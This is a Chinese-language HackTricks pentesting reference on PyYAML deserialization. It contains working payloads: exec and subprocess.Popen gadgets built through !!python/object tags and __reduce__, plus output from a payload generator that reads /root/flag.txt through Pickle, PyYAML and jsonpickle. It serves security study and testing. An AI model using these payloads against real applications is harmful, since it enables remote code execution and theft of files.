从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家) ! 支持 HackTricks 的其他方式:
如果您想看到您的公司在 HackTricks 中做广告 或下载 PDF 版本的 HackTricks ,请查看订阅计划
Yaml 反序列化
Yaml Python 库还能够序列化 Python 对象 ,而不仅仅是原始数据:
复制 print(yaml.dump(str("lol")))
lol
...
print(yaml.dump(tuple("lol")))
!!python/tuple
- l
- o
- l
print(yaml.dump(range(1,10)))
!!python/object/apply:builtins.range
- 1
- 10
- 1 检查一下元组 不是原始数据类型,因此它被序列化 。同样的情况也发生在range (取自内置函数)上。
**safe_load()或 safe_load_all()**使用SafeLoader,不支持类对象的反序列化 。类对象的反序列化示例:
复制 import yaml
from yaml import UnsafeLoader , FullLoader , Loader
data = b '!!python/object/apply:builtins.range [1, 10, 1]'
print (yaml. load (data, Loader = UnsafeLoader)) #range(1, 10)
print (yaml. load (data, Loader = Loader)) #range(1, 10)
print (yaml. load_all (data)) #<generator object load_all at 0x7fc4c6d8f040>
print (yaml. load_all (data, Loader = Loader)) #<generator object load_all at 0x7fc4c6d8f040>
print (yaml. load_all (data, Loader = UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print (yaml. load_all (data, Loader = FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print (yaml. unsafe_load (data)) #range(1, 10)
print (yaml. full_load_all (data)) #<generator object load_all at 0x7fc4c6d8f040>
print (yaml. unsafe_load_all (data)) #<generator object load_all at 0x7fc4c6d8f040>
#The other ways to load data will through an error as they won't even attempt to
#deserialize the python object 先前的代码使用unsafe_load 来加载序列化的Python类。这是因为在版本 >= 5.1 中,它不允许反序列化任何序列化的Python类或类属性 ,如果在load()中未指定Loader或Loader=SafeLoader。
基本利用
执行sleep 的示例:
复制 import yaml
from yaml import UnsafeLoader , FullLoader , Loader
data = b '!!python/object/apply:time.sleep [2]'
print (yaml. load (data, Loader = UnsafeLoader)) #Executed
print (yaml. load (data, Loader = Loader)) #Executed
print (yaml. load_all (data))
print (yaml. load_all (data, Loader = Loader))
print (yaml. load_all (data, Loader = UnsafeLoader))
print (yaml. load_all (data, Loader = FullLoader))
print (yaml. unsafe_load (data)) #Executed
print (yaml. full_load_all (data))
print (yaml. unsafe_load_all (data)) 使用没有Loader的可利用.load("<content>")
旧版本的pyyaml在加载内容时如果没有指定Loader ,存在反序列化攻击的漏洞:yaml.load(data)
你可以在这里找到漏洞的描述 。 该页面提出的利用 是:
复制 !!python/object/new:str
state : !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
state :
update : !!python/name:exec 或者您也可以使用@ishaack提供的这个一行代码 :
复制 !!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]} 请注意,在最近的版本 中,您不能再调用.load()而不使用 Loader FullLoader**不再容易受到这种攻击。
RCE
可以使用Python YAML模块(如PyYAML 或ruamel.yaml )创建自定义有效载荷。这些有效载荷可以利用系统中对未经适当消毒的输入进行反序列化的漏洞。
复制 import yaml
from yaml import UnsafeLoader , FullLoader , Loader
import subprocess
class Payload ( object ):
def __reduce__ ( self ):
return (subprocess . Popen , ( 'ls' , ))
deserialized_data = yaml . dump ( Payload ()) # serializing data
print (deserialized_data)
#!!python/object/apply:subprocess.Popen
#- ls
print (yaml. load (deserialized_data, Loader = UnsafeLoader))
print (yaml. load (deserialized_data, Loader = Loader))
print (yaml. unsafe_load (deserialized_data)) 用于生成Payloads的工具
可以使用工具https://github.com/j0lt-github/python-deserialization-attack-payload-generator 来生成Python反序列化Payloads,以滥用Pickle、PyYAML、jsonpickle和ruamel.yaml :
复制 python3 peas.py
Enter RCE command :cat /root/flag.txt
Enter operating system of target [linux/windows] . Default is linux :linux
Want to base64 encode payload ? [N/y] :
Enter File location and name to save :/tmp/example
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All ) :All
Done Saving file !!!!
cat /tmp/example_jspick
{ "py/reduce" : [{ "py/type" : "subprocess.Popen" }, { "py/tuple" : [{ "py/tuple" : [ "cat" , "/root/flag.txt" ]}]}]}
cat /tmp/example_pick | base64 -w0
gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg = =
cat /tmp/example_yaml
!! python/object/apply:subprocess.Popen
- !!python/tuple
- cat
- /root/flag.txt 参考资料
从零开始学习AWS黑客技术 htARTE (HackTricks AWS Red Team Expert) ! 支持HackTricks的其他方式:
如果您想看到您的公司在HackTricks中做广告 或下载PDF格式的HackTricks ,请查看订阅计划
